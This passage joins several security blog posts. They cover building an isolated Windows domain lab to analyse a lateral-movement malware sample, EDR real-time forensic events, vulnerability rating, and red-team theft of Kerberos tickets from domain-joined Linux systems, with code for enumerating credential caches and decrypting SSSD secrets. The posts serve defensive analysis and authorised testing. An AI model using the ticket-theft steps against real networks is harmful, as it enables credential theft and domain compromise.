  • Ensure that “Connect a host virtual adapter” is disabled to prevent connection to the outside world.
  • Ensure that the “Use local DHCP service” option is disabled if static IP addresses will be used.

This is demonstrated in Figure 6.


Figure 6: Virtual network adapter configuration

Then, configure the guests’ network adapters to connect to this network.

  • Configure hostnames and static IP addresses for the virtual machines.
  • Choose the domain controller IP as the default gateway and DNS server for all guests. 

We used the system configurations shown in Figure 7.


Figure 7: Example system configurations

Once everything is configured, begin by installing Active Directory Domain Services and DNS Server roles onto the designated domain controller server. This can be done by selecting the options shown in Figure 8 via the Windows Server Manager application. The default settings can be used throughout the dialog as roles are added.


Figure 8: Roles needed on domain controller
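
If you prefer PowerShell to Server Manager, the role installation can be sketched as follows (a minimal sketch using the built-in ServerManager cmdlet):

# Install the AD DS and DNS Server roles with their management tools
Install-WindowsFeature AD-Domain-Services, DNS -IncludeManagementTools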

Once the roles are installed, run the promotion operation as demonstrated in Figure 9. The promotion option is accessible through the notifications menu (flag icon) once the Active Directory Domain Services role is added to the server. Add a new forest with a fully qualified root domain name such as testdomain.local. Other options may be left as default. Once the promotion process is complete, reboot the system.


Figure 9: Promoting system to domain controller in Server Manager
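
The promotion can likewise be scripted; a minimal sketch using the domain name from this walkthrough (other options left at their defaults):

# Promote this server to a domain controller for a new forest; prompts for the DSRM password
Install-ADDSForest -DomainName "testdomain.local" -InstallDns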

Once the domain controller is promoted, create a test user account via Active Directory Users and Computers on the domain controller. An example is shown in Figure 10.


Figure 10: Test user account
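
Creating the test user can also be done from PowerShell; a minimal sketch (the account name matches the one used later in this post):

# Create an enabled test account; prompts for the password
New-ADUser -Name "sa_jdoe" -SamAccountName "sa_jdoe" `
    -AccountPassword (Read-Host -AsSecureString "Password") -Enabled $true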

Once the test account is created, proceed to join the other systems on the virtual network to the domain. This can be done through Advanced System Settings as shown in Figure 11. Use the test account credentials to join the system to the domain.


Figure 11: Configure the domain name for each guest
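
Joining each guest can be scripted as well; a minimal sketch (the NetBIOS domain name here is an assumption for this lab):

# Join the domain with the test account, then reboot
Add-Computer -DomainName "testdomain.local" -Credential "TESTDOMAIN\sa_jdoe" -Restart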

Once all systems are joined to the domain, verify that each system can ping the other systems. We recommend disabling the Windows Firewall in the test environment to ensure that each system can access all available services of another system in the test environment.
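
In an isolated lab, both steps can be handled quickly from PowerShell; a lab-only sketch:

# Lab only: disable Windows Firewall on all profiles, then verify reachability
Set-NetFirewallProfile -Profile Domain,Private,Public -Enabled False
Test-Connection DC.testdomain.local -Count 2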

Give the test account administrative rights on all test systems. This can be done by modifying the local administrator group on each system manually with the command shown in Figure 12 or automated through a Group Policy Object (GPO).

net localgroup administrators sa_jdoe /ADD

Figure 12: Command to add user to local administrators group

Dynamic Analysis on the Domain

At this point, we were ready to begin our dynamic analysis. We prepared our test environment by installing and launching Wireshark and Process Monitor. We took snapshots of all three guests and ran the malware in the context of the test domain account on the client as shown in Figure 13.

evil.exe /P:"C:\Windows\System32\calc.exe" /L:hostnames.txt /F:log.txt /S /C

Figure 13: Command used to run the malware

We populated the hostnames.txt file with the following line-delimited hostnames as demonstrated in Figure 14.

DBPROD.testdomain.local
client.testdomain.local
DC.testdomain.local

Figure 14: File contents of hostnames.txt

Packet Capture Analysis

Upon analyzing the traffic in the packet capture, we identified SMB connections to each system in the host list. Before the SMB handshake completed, Kerberos tickets were requested. A ticket granting ticket (TGT) was requested for the user, and service tickets were requested for each server as seen in Figure 15. To learn more about the Kerberos authentication protocol, please see our recent blog post that introduces the protocol along with a new Mandiant Red Team tool.


Figure 15: Kerberos authentication process

The malware accessed the C$ share over SMB and wrote the file C:\Windows\swaqp.exe. It then used RPC to reach the SVCCTL interface of the Service Control Manager, which is used to register and launch services, and created the swaqpd service. The service was used to execute the payload and was subsequently deleted. Finally, the file was deleted, and no additional activity was observed. The traffic is shown in Figure 16.


Figure 16: Malware behavior observed in packet capture

Our analysis of the malware behavior with Process Monitor confirmed this observation. We then proceeded to run the malware with different command line options and environments. Combined with our static analysis, we were able to determine with confidence the malware capabilities, which include copying a payload to a remote host, installing and running a service, and deleting the evidence afterward.

Conclusion

Static analysis of a large, obfuscated sample can take dozens of hours. Dynamic analysis can provide an alternate solution, but it requires the analyst to predict and simulate a proper execution environment. In this case we were able to combine our basic analysis fundamentals with a virtualized Windows domain to get the job done. We leveraged the diverse skills available to FireEye by combining FLARE reverse engineering expertise with Mandiant consulting and Red Team experience. This combination reduced analysis time to several hours. We supported an active incident response investigation by quickly extracting the necessary indicators from the compromised host. We hope that sharing this experience can assist others in building their own environment for lateral movement analysis.

Using Real-Time Events in Investigations

To understand what a threat actor did on a Windows system, analysts often turn to the tried and true sources of historical endpoint artifacts such as the Master File Table (MFT), registry hives, and Application Compatibility Cache (AppCompat). However, these evidence sources were not designed with detection or incident response in mind; crucial details may be omitted or cleared through anti-forensic methods. By looking at historical evidence alone, an analyst may not see the full story.

Real-time events can be thought of as forensic artifacts specifically designed for detection and incident response, implemented through Endpoint Detection and Response (EDR) solutions or enhanced logging implementations like Sysmon. During active-attacker endpoint investigations, FireEye Mandiant has found real-time events to be useful in filling in the gaps of what an attacker did. These events record different types of system activities such as process execution, file write activity, network connections, and more.

During incident response engagements, Mandiant uses FireEye Endpoint Security to track endpoint system events in real-time. This feature allows investigators to track an attacker on any system by alerting on and reviewing these real-time events. An analyst can use our solution’s built-in Audit Viewer or Redline to review real-time events.

Let’s look at some examples of Windows real-time events available on our solution and how they can be leveraged during an investigation. Let’s assume the account TEST-DOMAIN\BackupAdmin was an inactive Administrator account compromised by an attacker. Please note the examples provided in this post are based on real-time events observed during engagements but have been recreated or altered to preserve client confidentiality.

Process Execution Events

There are many historical process execution artifacts including AppCompat, AmCache, WMI CCM_RecentlyUsedApps, and more. A single artifact rarely covers all the useful details relating to a process's execution, but real-time process execution events change that. Our solution’s real-time process execution events record execution time, full process path, process identification number (PID), parent process path, parent PID, user, command line arguments, and even the process MD5 hash.

Table 1 provides an example of a real-time process execution event recorded by our solution.

Field                 Example
Timestamp (UTC)       2020-03-10 16:40:58.235
Sequence Number       2879512
PID                   9392
Process Path          C:\Windows\Temp\legitservice.exe
Username              TEST-DOMAIN\BackupAdmin
Parent PID            9103
Parent Process Path   C:\Windows\System32\cmd.exe
EventType             Start
ProcessCmdLine        "C:\Windows\Temp\legitservice.exe"  -b -m
Process MD5 Hash      a823bc31395539816e8e4664e884550f

Table 1: Example real-time process execution event

Based on this real-time process execution event, the process C:\Windows\System32\cmd.exe with PID 9103 executed the file C:\Windows\Temp\legitservice.exe with PID 9392 and the MD5 hash a823bc31395539816e8e4664e884550f. This new process used the command line arguments -b -m under the user context of TEST-DOMAIN\BackupAdmin.

We can compare this real-time event with what an analyst might see in other process execution artifacts. Table 2 provides an example AppCompat entry for the same executed process. Note the recorded timestamp is for the last modified time of the file, not the process start time.

Field                      Example
File Last Modified (UTC)   2020-03-07 23:48:09
File Path                  C:\Windows\Temp\legitservice.exe
Executed Flag              TRUE

Table 2: Example AppCompat entry

Table 3 provides an example AmCache entry. Note the last modified time of the registry key can usually be used to determine the process start time and this artifact includes the SHA1 hash of the file.

Field                              Example
Registry Key Last Modified (UTC)   2020-03-10 16:40:58
File Path                          C:\Windows\Temp\legitservice.exe
File Sha1 Hash                     2b2e04ab822ef34969b7d04642bae47385be425c

Table 3: Example AmCache entry

Table 4 provides an example Windows Event Log process creation event. Note this artifact includes the PID in hexadecimal notation, details about the parent process, and even a field for where the process command line arguments should be. In this example the command line arguments are not present because they are disabled by default and Mandiant rarely sees this policy enabled by clients on investigations.

Field              Example
Write Time (UTC)   2020-03-10 16:40:58
Log                Security
Source             Microsoft Windows security
EID                4688
Message            A new process has been created.

                   Creator Subject:
                         Security ID:             TEST-DOMAIN\BackupAdmin
                         Account Name:            BackupAdmin
                         Account Domain:          TEST-DOMAIN
                         Logon ID:                0x6D6AD

                   Target Subject:
                         Security ID:             NULL SID
                         Account Name:            -
                         Account Domain:          -
                         Logon ID:                0x0

                   Process Information:
                         New Process ID:          0x24b0
                         New Process Name:        C:\Windows\Temp\legitservice.exe
                         Token Elevation Type:    %%1938
                         Mandatory Label:         Mandatory Label\Medium Mandatory Level
                         Creator Process ID:      0x238f
                         Creator Process Name:    C:\Windows\System32\cmd.exe
                         Process Command Line:

Table 4: Example Windows event log process creation event

If we combine the evidence available in AmCache with a fully detailed Windows Event Log process creation event, we could match the evidence available in the real-time event except for a small difference in file hash types.

File Write Events

An attacker may choose to modify or delete important evidence. If an attacker uses a file shredding tool like Sysinternals SDelete, it is unlikely the analyst will recover the original contents of the file. Our solution's real-time file write events are incredibly useful in situations like this because they record the MD5 hash of the files written and partial contents of the file. File write events also record which process created or modified the file in question.

Table 5 provides an example of a real-time file write event recorded by our solution.

Field                                  Example
Timestamp (UTC)                        2020-03-10 16:42:59.956
Sequence Number                        2884312
PID                                    9392
Process Path                           C:\Windows\Temp\legitservice.exe
Username                               TEST-DOMAIN\BackupAdmin
Device Path                            \Device\HarddiskVolume2
File Path                              C:\Windows\Temp\WindowsServiceNT.log
File MD5 Hash                          30a82a8a864b6407baf9955822ded8f9
Num Bytes Seen Written                 8
Size                                   658
Writes                                 4
Event Reason                           File closed
Closed                                 TRUE
Base64 Encoded Data At Lowest Offset   Q3JlYXRpbmcgJ1dpbmRvd3NTZXJ2aWNlTlQubG9nJyBsb2dmaWxlIDogT0sNCm1pbWlrYXR6KGNvbW1hbmQ
Text At Lowest Offset                  Creating 'WindowsServiceNT.log' logfile : OK....mimikatz(command

Table 5: Example real-time file write event

Based on this real-time file write event, the malicious executable C:\Windows\Temp\legitservice.exe wrote the file C:\Windows\Temp\WindowsServiceNT.log to disk with the MD5 hash 30a82a8a864b6407baf9955822ded8f9. Since the real-time event recorded the beginning of the written file, we can determine the file likely contained Mimikatz credential harvester output which Mandiant has observed commonly starts with OK....mimikatz.

If we investigate a little later, we’ll see a process creation event for C:\Windows\Temp\taskassist.exe with the MD5 file hash 2b5cb081721b8ba454713119be062491 followed by several file write events for this process summarized in Table 6.

Timestamp                 File Path                              File Size
2020-03-10 16:53:42.351   C:\Windows\Temp\WindowsServiceNT.log   638
2020-03-10 16:53:42.351   C:\Windows\Temp\AAAAAAAAAAAAAAAA.AAA   638
2020-03-10 16:53:42.351   C:\Windows\Temp\BBBBBBBBBBBBBBBB.BBB   638
2020-03-10 16:53:42.351   C:\Windows\Temp\CCCCCCCCCCCCCCCC.CCC   638
...                       ...                                    ...
2020-03-10 16:53:42.382   C:\Windows\Temp\XXXXXXXXXXXXXXXX.XXX   638
2020-03-10 16:53:42.382   C:\Windows\Temp\YYYYYYYYYYYYYYYY.YYY   638
2020-03-10 16:53:42.382   C:\Windows\Temp\ZZZZZZZZZZZZZZZZ.ZZZ   638

Table 6: Example timeline of SDelete file write events

Admittedly, this activity may seem strange at first glance. If we do some research on its file hash, we'll see the process is actually SDelete masquerading as C:\Windows\Temp\taskassist.exe. As part of its secure deletion process, SDelete renames the file 26 times in a successive alphabetic manner.

Network Events

Incident responders rarely see evidence of network communication from historical evidence on an endpoint without enhanced logging. Usually, Mandiant relies on NetFlow data, network sensors with full or partial packet capture, or malware analysis to determine the command and control (C2) servers with which a malware sample can communicate. Our solution’s real-time network events record both local and remote network ports, the leveraged protocol, and the relevant process.

Table 7 provides an example of a real-time IPv4 network event recorded by our solution.

Field               Example
Timestamp (UTC)     2020-03-10 16:46:51.690
Sequence Number     2895588
PID                 9392
Process Path        C:\Windows\Temp\legitservice.exe
Username            TEST-DOMAIN\BackupAdmin
Local IP Address    10.0.0.52
Local Port          57472
Remote IP Address   10.0.0.51
Remote Port         443
Protocol            TCP

Table 7: Example real-time network connection event

Based on this real-time IPv4 network event, the malicious executable C:\Windows\Temp\legitservice.exe made an outbound TCP connection to 10.0.0.51:443.

Registry Key Events

By using historical evidence to investigate relevant timeframes and commonly abused registry keys, we can identify malicious or leveraged keys. Real-time registry key events are useful for linking processes to the modified registry keys. They can also show when an attacker deletes or renames a registry key. This is useful to an analyst because the only available timestamp recorded in the registry is the last modified time of a registry key, and this timestamp is updated if a parent key is updated.

Table 8 provides an example of a real-time registry key event recorded by our solution.

Timestamp (UTC): 2020-03-10 16:46:56.409
Sequence Number: 2898196
PID: 9392
Process + Path: C:\Windows\Temp\legitservice.exe
Username: TEST-DOMAIN\BackupAdmin
Event Type: 3
Path: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Services\LegitWindowsService\ImagePath
Key Path: CurrentControlSet\Services\LegitWindowsService
Original Path: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\LegitWindowsService
Value Name: ImagePath
Value Type: REG_EXPAND_SZ
Base64 Encoded Value: QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABsAGUAZwBpAHQAcwBlAHIAdgBpAGMAZQAuAGUAeABlAAAAAA==
Text: C:\Windows\Temp\legitservice.exe

Table 8: Example real-time registry key event
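Registry string values are stored as UTF-16LE, so the captured Base64 value decodes with a different text encoding than the file data earlier. A standard-library Python sketch using the value from Table 8:

```python
import base64

# Base64-encoded REG_EXPAND_SZ value from Table 8
value = ("QwA6AFwAVwBpAG4AZABvAHcAcwBcAFQAZQBtAHAAXABsAG"
         "UAZwBpAHQAcwBlAHIAdgBpAGMAZQAuAGUAeABlAAAAAA==")

raw = base64.b64decode(value)
# Registry string data is UTF-16LE; trim any stray trailing byte,
# then strip the null terminator
trimmed = raw[: len(raw) - (len(raw) % 2)]
print(trimmed.decode("utf-16-le").rstrip("\x00"))  # C:\Windows\Temp\legitservice.exe
```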

For our solution's real-time registry events, we can map the event type to the operation performed using Table 9.

Event Type Value    Operation

1                   PreSetValueKey
2                   PreDeleteValueKey
3                   PostCreateKey, PostCreateKeyEx, PreCreateKeyEx
4                   PreDeleteKey
5                   PreRenameKey

Table 9: FireEye Endpoint Security real-time registry key event types
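When processing these events programmatically, the mapping in Table 9 translates directly into a lookup table. A small Python sketch; the event dict shape is illustrative:

```python
# Table 9 expressed as a lookup table for enriching raw registry events
REGISTRY_EVENT_TYPES = {
    1: "PreSetValueKey",
    2: "PreDeleteValueKey",
    3: "PostCreateKey, PostCreateKeyEx, PreCreateKeyEx",
    4: "PreDeleteKey",
    5: "PreRenameKey",
}

event = {"event_type": 3, "key_path": r"CurrentControlSet\Services\LegitWindowsService"}
print(REGISTRY_EVENT_TYPES.get(event["event_type"], "Unknown"))
# PostCreateKey, PostCreateKeyEx, PreCreateKeyEx
```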

Based on this real-time registry key event, the malicious executable C:\Windows\Temp\legitservice.exe created the Windows service LegitWindowsService. If we investigated the surrounding registry keys, we might identify even more information about this malicious service.

Conclusion

The availability of real-time events designed for forensic analysis can fill in gaps that traditional forensic artifacts cannot on their own. Mandiant has seen great value in using real-time events during active-attacker investigations. We have used real-time events to determine the functionality of attacker utilities that were no longer present on disk, to determine users and source network addresses used during malicious remote desktop activity when expected corresponding event logs were missing, and more.

Check out our FireEye Endpoint Security page and Redline page for more information (as well as Redline on the FireEye Market), and take a FireEye Endpoint Security tour today.

Separating the Signal from the Noise: How Mandiant Intelligence Rates Vulnerabilities — Intelligence for Vulnerability Management, Part Three

One of the critical strategic and tactical roles that cyber threat intelligence (CTI) plays is in the tracking, analysis, and prioritization of software vulnerabilities that could potentially put an organization’s data, employees and customers at risk. In this four-part blog series, FireEye Mandiant Threat Intelligence highlights the value of CTI in enabling vulnerability management, and unveils new research into the latest threats, trends and recommendations.

Every information security practitioner knows that patching vulnerabilities is one of the first steps toward a healthy and well-maintained organization. But with thousands of vulnerabilities disclosed each year and media hype surrounding the newest "branded" vulnerability, it's hard to know where to start.

The National Vulnerability Database (NVD) considers a range of factors that are fed into an automated process to arrive at a score for CVSSv3. Mandiant Threat Intelligence takes a different approach, drawing on the insight and experience of our analysts (Figure 1). This human input allows for qualitative factors to be taken into consideration, which gives additional focus to what matters to security operations.


Figure 1: How Mandiant Rates Vulnerabilities

Assisting Patch Prioritization

We believe our approach results in a score that is more useful for determining patching priorities, as it allows for the adjustment of ratings based on factors that are difficult to quantify using automated means. It also significantly reduces the number of vulnerabilities rated ‘high’ and ‘critical’ compared to CVSSv3 (Figure 2). We consider critical vulnerabilities to pose significant security risks and strongly suggest that remediation steps are taken to address them as soon as possible. We also believe that limiting ‘critical’ and ‘high’ designations helps security teams to effectively focus attention on the most dangerous vulnerabilities. For instance, from 2016-2019 Mandiant only rated two vulnerabilities as critical, while NVD assigned 3,651 vulnerabilities a ‘critical’ rating (Figure 3).


Figure 2: Criticality of US National Vulnerability Database (NVD) CVSSv3 ratings 2016-2019 compared to Mandiant vulnerability ratings for the same vulnerabilities


Figure 3: Numbers of ratings at various criticality tiers from NVD CVSSv3 scores compared to Mandiant ratings for the same vulnerabilities

Mandiant Vulnerability Ratings Defined

Our rating system includes both an exploitation rating and a risk rating:

The Exploitation Rating is an indication of what is occurring in the wild.


Figure 4: Mandiant Exploitation Rating definitions

The Risk Rating is our expert assessment of the impact an attacker could have on a targeted organization if they were to exploit a vulnerability.


Figure 5: Mandiant Risk Rating definitions

We intentionally use the critical rating sparingly, typically in cases where exploitation has serious impact, exploitation is trivial with often no real mitigating factors, and the attack surface is large and remotely accessible. When Mandiant uses the critical rating, it is an indication that remediation should be a top priority for an organization due to the potential impacts and ease of exploitation.

For example, Mandiant Threat Intelligence rated CVE-2019-19781 as critical due to the confluence of widespread exploitation—including by APT41—the public release of proof-of-concept (PoC) code that facilitated automated exploitation, the potentially acute outcomes of exploitation, and the ubiquity of the software in enterprise environments.

CVE-2019-19781 is a path traversal vulnerability in Citrix Application Delivery Controller (ADC) 13.0 that, when exploited, allows an attacker to remotely execute arbitrary code. Due to the nature of these systems, successful exploitation could lead to further compromise of a victim's network through lateral movement or the discovery of Active Directory (AD) and/or LDAP credentials. Though these credentials are often stored as hashes, they have been proven to be vulnerable to password cracking. Depending on the environment, the potential second-order effects of exploitation of this vulnerability could be severe.

We described widespread exploitation of CVE-2019-19781 in our blog post earlier this year, including a timeline from disclosure on Dec. 17, 2019, to the patch releases, which began a little over a month later on Jan. 20, 2020. Significantly, within hours of the release of PoC code on Jan. 10, 2020, we detected reconnaissance for this vulnerability in FireEye telemetry data. Within days, we observed weaponized exploits used to gain footholds in victim environments. On the same day the first patches were released, Jan. 20, 2020, we observed APT41, one of the most prolific Chinese groups we track, kick off an expansive campaign exploiting CVE-2019-19781 and other vulnerabilities against numerous targets.

Factors Considered in Ratings

Our vulnerability analysts consider a wide variety of impact-intensifying and mitigating factors when rating a vulnerability. Factors such as actor interest, availability of exploit or PoC code, or exploitation in the wild can inform our analysis, but are not primary elements in rating.

Impact considerations help determine what impact exploitation of the vulnerability can have on a targeted system.

Exploitation Consequence: The result of successful exploitation, such as privilege escalation or remote code execution
Confidentiality Impact: The extent to which exploitation can compromise the confidentiality of data on the impacted system
Integrity Impact: The extent to which exploitation allows attackers to alter information in impacted systems
Availability Impact: The extent to which exploitation disrupts or restricts access to data or systems

Mitigating factors affect an attacker’s likelihood of successful exploitation.

Exploitation Vector: What methods can be used to exploit the vulnerability?
Attacking Ease: How difficult is the exploit to use in practice?
Exploit Reliability: How consistently can the exploit execute and perform the intended malicious activity?
Access Vector: What type of access (i.e., local, adjacent network, or network) is required to successfully exploit the vulnerability?
Access Complexity: How difficult is it to gain the access needed to exploit the vulnerability?
Authentication Requirements: Does exploitation require authentication and, if so, what type of authentication?
Vulnerable Product Ubiquity: How commonly is the vulnerable product used in enterprise environments?
Product's Targeting Value: How attractive is the vulnerable software product or device to threat actors as a target?
Vulnerable Configurations: Does exploitation require specific configurations, either default or non-standard?

Mandiant Vulnerability Rating System Applied

The following are examples of cases in which Mandiant Threat Intelligence rated vulnerabilities differently than NVD by considering additional factors and incorporating information that either was not reported to NVD or is not easily quantified in an algorithm.

CVE-2019-12650

Description: A command injection vulnerability in the Web UI component of Cisco IOS XE versions 16.11.1 and earlier that, when exploited, allows a privileged attacker to remotely execute arbitrary commands with root privileges.
NVD Rating: High
Mandiant Rating: Low
Explanation: This vulnerability was rated high by NVD, but Mandiant Threat Intelligence rated it as low risk because it requires the highest level of privileges (level 15 admin privileges) to exploit. Because this level of access should be quite limited in enterprise environments, we believe attackers are unlikely to be able to leverage this vulnerability as easily as others. There is no known exploitation of this vulnerability.

CVE-2019-5786

Description: A use-after-free vulnerability within the FileReader component in Google Chrome 72.0.3626.119 and prior that, when exploited, allows an attacker to remotely execute arbitrary code.
NVD Rating: Medium
Mandiant Rating: High
Explanation: NVD rated CVE-2019-5786 as medium, while Mandiant Threat Intelligence rated it as high risk. The difference in ratings is likely due to NVD describing the consequences of exploitation as denial of service, while we know of exploitation in the wild that results in remote code execution in the context of the renderer, which is a more serious outcome.
As demonstrated, factors such as the assessed ease of exploitation and the observation of exploitation in the wild may result in a different priority rating than the one issued by NVD. In the case of CVE-2019-12650, we ultimately rated this vulnerability lower than NVD due to the privileges required to exploit it as well as the lack of observed exploitation. On the other hand, we rated CVE-2019-5786 as high risk due to the assessed severity, the ubiquity of the software, and confirmed exploitation.

In early 2019, Google reported that two zero-day vulnerabilities were being used together in the wild: CVE-2019-5786 (a Chrome zero-day vulnerability) and CVE-2019-0808 (a Microsoft privilege escalation vulnerability). Google quickly released a patch for the Chrome vulnerability and pushed it to users through Chrome's auto-update feature on March 1. CVE-2019-5786 is significant because it can impact all major operating systems (Windows, macOS, and Linux) and requires only minimal user interaction, such as navigating or following a link to a website hosting exploit code, to achieve remote code execution. The severity is further compounded by a public blog post and proof-of-concept exploit code that were released a few weeks later and subsequently incorporated into a Metasploit module.

The Future of Vulnerability Analysis Requires Algorithms and Human Intelligence

We expect the volume of vulnerabilities to continue to increase in coming years, emphasizing the need for a rating system that accurately identifies the most significant vulnerabilities and provides enough nuance to allow security teams to tackle patching in a focused manner. As the quantity of vulnerabilities grows, incorporating assessments of malicious actor use (that is, observed exploitation as well as the feasibility and relative ease of using a particular vulnerability) will become an even more important factor in making meaningful prioritization decisions.

Mandiant Threat Intelligence believes that the future of vulnerability analysis will involve a combination of machine (structured or algorithmic) and human analysis to assess the potential impact of a vulnerability and the true threat that it poses to organizations. Use of structured algorithmic techniques, which are common in many models, allows for consistent and transparent rating levels, while the addition of human analysis allows experts to integrate factors that are difficult to quantify, and adjust ratings based on real-world experience regarding the actual risk posed by various types of vulnerabilities.

Human curation and enhancement layered on top of automated rating will provide the best of both worlds: speed and accuracy. We strongly believe that paring down alerts and patch information to a manageable number, as well as clearly communicating risk levels with Mandiant vulnerability ratings, makes our system a powerful tool that equips network defenders to quickly and confidently take action against the highest priority issues first.

Register today to hear FireEye Mandiant Threat Intelligence experts discuss the latest in vulnerability threats, trends and recommendations in our upcoming April 30 webinar.

Kerberos Tickets on Linux Red Teams

At FireEye Mandiant, we conduct numerous red team engagements within Windows Active Directory environments. Consequently, we frequently encounter Linux systems integrated into Active Directory environments. Compromising an individual domain-joined Linux system can provide useful data on its own, but the best value is obtaining data, such as Kerberos tickets, that facilitates lateral movement. By passing these Kerberos tickets from a Linux system, it is possible to move laterally from a compromised Linux system to the rest of the Active Directory domain.

There are several ways to configure a Linux system to store Kerberos tickets. In this blog post, we will introduce Kerberos and cover some of the various storage solutions. We will also introduce a new tool that extracts Kerberos tickets from domain-joined systems that utilize the System Security Services Daemon Kerberos Cache Manager (SSSD KCM).

What is Kerberos

Kerberos is a standardized authentication protocol that was originally created by MIT in the 1980s. The protocol has evolved over time. Today, Kerberos Version 5 is implemented by numerous products, including Microsoft Active Directory. Kerberos was originally designed to mutually authenticate identities over an unsecured communication line.

The Microsoft implementation of Kerberos is used in Active Directory environments to securely authenticate users to various services, such as the domain (LDAP), database servers (MSSQL) and file shares (SMB/CIFS). While other authentication protocols exist within Active Directory, Kerberos is one of the most popular methods. Technical documentation on how Microsoft implemented Kerberos Protocol Extensions within Active Directory can be found in the MS-KILE standards published on MSDN. 

Short Example of Kerberos Authentication in Active Directory

To illustrate how Kerberos works, we have selected a common scenario where a user John Smith with the account ACMENET.CORP\sa_jsmith wishes to authenticate to a Windows SMB (CIFS) file share in the Acme Corporation domain, hosted on the server SQLSERVER.ACMENET.CORP.

There are two main types of Kerberos tickets used in Active Directory: Ticket Granting Ticket (TGT) and service tickets. Service tickets are obtained from the Ticket Granting Service (TGS). The TGT is used to authenticate the identity of a particular entity in Active Directory, such as a user account. Service tickets are used to authenticate a user to a specific service hosted on a system. A valid TGT can be used to request service tickets from the Key Distribution Center (KDC). In Active Directory environments, the KDC is hosted on a Domain Controller.

The diagram in Figure 1 shows the authentication flow.

Figure 1: Example Kerberos authentication flow

In summary (a scripted sketch of the first two steps follows the list):

  1. The user requests a Ticket Granting Ticket (TGT) from the Domain Controller.
  2. Once granted, the user passes the TGT back to the Domain Controller and requests a service ticket for cifs/SQLSERVER.ACMENET.CORP.
  3. After the Domain Controller validates the request, a service ticket is issued that will authenticate the user to the CIFS (SMB) service on SQLSERVER.ACMENET.CORP.
  4. The user receives the service ticket from the Domain Controller and initiates an SMB negotiation with SQLSERVER.ACMENET.CORP. During the authentication process, the user provides a Kerberos blob inside an “AP-REQ” structure that includes the service ticket previously obtained.
  5. The server validates the service ticket and authenticates the user.
  6. If the server determines that the user has permissions to access the share, the user can begin making SMB queries.
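The first two steps can be reproduced from any system that can reach the KDC. Below is a rough sketch using the open-source Impacket library; the account password and KDC host name are illustrative values for this fictional scenario, and exact function signatures may vary between Impacket versions:

```python
from impacket.krb5 import constants
from impacket.krb5.kerberosv5 import getKerberosTGT, getKerberosTGS
from impacket.krb5.types import Principal

# Step 1: request a TGT for the user from the Domain Controller (the KDC)
user = Principal("sa_jsmith", type=constants.PrincipalNameType.NT_PRINCIPAL.value)
tgt, cipher, _, session_key = getKerberosTGT(
    user, "Password123!", "ACMENET.CORP",
    lmhash="", nthash="", aesKey="", kdcHost="dc.acmenet.corp")

# Step 2: present the TGT and request a service ticket for the CIFS SPN
spn = Principal("cifs/SQLSERVER.ACMENET.CORP",
                type=constants.PrincipalNameType.NT_SRV_INST.value)
tgs, cipher, _, service_session_key = getKerberosTGS(
    spn, "ACMENET.CORP", "dc.acmenet.corp", tgt, cipher, session_key)

print("Obtained service ticket for cifs/SQLSERVER.ACMENET.CORP")
```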

For an in-depth example of how Kerberos authentication works, scroll down to view the appendix at the bottom of this article.

Kerberos On Linux Domain-Joined Systems

When a Linux system is joined to an Active Directory domain, it also needs Kerberos tickets to access services in the domain. However, Linux uses a different Kerberos implementation: instead of Windows-formatted tickets (commonly referred to as the KIRBI format), Linux uses MIT-format Kerberos credential caches (CCACHE files).

When a user on a Linux system wants to access a remote service with Kerberos, such as a file share, the same procedure is used to request the TGT and corresponding service ticket. In older, more traditional implementations, Linux systems often stored credential cache files in the /tmp directory. Although the files are locked down and not world-readable, a malicious user with root access to the Linux system could trivially obtain a copy of the Kerberos tickets and reuse them.
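On such systems the caches are ordinary files, so an attacker with root access can simply enumerate them. A small illustrative Python sketch, assuming the common MIT default naming of /tmp/krb5cc_&lt;uid&gt;:

```python
import glob
import os
import stat

# Enumerate MIT Kerberos credential caches in /tmp (default naming: krb5cc_<uid>)
for path in sorted(glob.glob("/tmp/krb5cc_*")):
    st = os.stat(path)
    print(f"{path}  owner_uid={st.st_uid}  perms={stat.filemode(st.st_mode)}")
    # With root access, each cache can be copied and reused elsewhere,
    # e.g. by pointing the KRB5CCNAME environment variable at the stolen copy
```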

On modern versions of Red Hat Enterprise Linux and derivative distributions, the System Security Services Daemon (SSSD) is used to manage Kerberos tickets on domain-joined systems. SSSD implements its own form of Kerberos Cache Manager (KCM) and encrypts tickets within a database on the system. When a user needs access to a TGT or service ticket, the ticket is retrieved from the database, decrypted, and then passed to the remote service (for more on SSSD, check out this great research from Portcullis Labs).

By default, SSSD maintains a copy of the database at the path /var/lib/sss/secrets/secrets.ldb. The corresponding key is stored as a hidden file at the path /var/lib/sss/secrets/.secrets.mkey. By default, the key is only readable if you have root permissions.

If a user is able to extract both of these files, it is possible to decrypt them offline and obtain valid Kerberos tickets. We have published a new tool called SSSDKCMExtractor that will decrypt relevant secrets in the SSSD database and pull out the credential cache Kerberos blob. This blob can be converted into a usable Kerberos CCACHE file that can be passed to other tools, such as Mimikatz, Impacket, and smbclient. CCACHE files can be converted into Windows format using tools such as Kekeo.

We leave it as an exercise to the reader to convert the decrypted Kerberos blob into a usable credential cache file for pass-the-cache and pass-the-ticket operations.

Using SSSDKCMExtractor is simple. An example SSSD KCM database and key are shown in Figure 2.


Figure 2: SSSD KCM files

Invoking SSSDKCMExtractor with the --database and --key parameters will parse the database and decrypt the secrets as shown in Figure 3.


Figure 3: Extracting Kerberos data
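In other words, assuming copies of the database and key have been retrieved from the host, the invocation looks roughly like the following (the script filename is an assumption; --database and --key are the parameters described above, and the tool's README documents exact usage):

```
python SSSDKCMExtractor.py --database secrets.ldb --key .secrets.mkey
```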

After manipulating the data retrieved, it is possible to use the CCACHE in smbclient as shown in Figure 4. In this example, a domain administrator ticket was obtained and used to access the domain controller’s C$ share.


Figure 4: Compromising domain controller with extracted tickets

The Python script and instructions can be found on the FireEye Github.

Conclusion

By obtaining privileged access to a domain-joined Linux system, it is often possible to scrape Kerberos tickets useful for lateral movement. Although it is still common to find these tickets in the /tmp directory, it is now possible to also scrape these tickets from modern Linux systems that utilize the SSSD KCM.

With the right Kerberos tickets, it is possible to move laterally to the rest of the Active Directory domain. If a privileged user (such as a Domain Admin) authenticates to a compromised Linux system and leaves a ticket behind, it would be possible to steal that user's ticket and obtain privileged rights in the Active Directory domain.

Appendix: Detailed Example of Kerberos Authentication in Active Directory

To illustrate how Kerberos works, we have selected a common scenario where a user John Smith with the account ACMENET.CORP\sa_jsmith wishes to authenticate to a Windows SMB (CIFS) file share in the Acme Corporation domain, hosted on the server SQLSERVER.ACMENET.CORP.

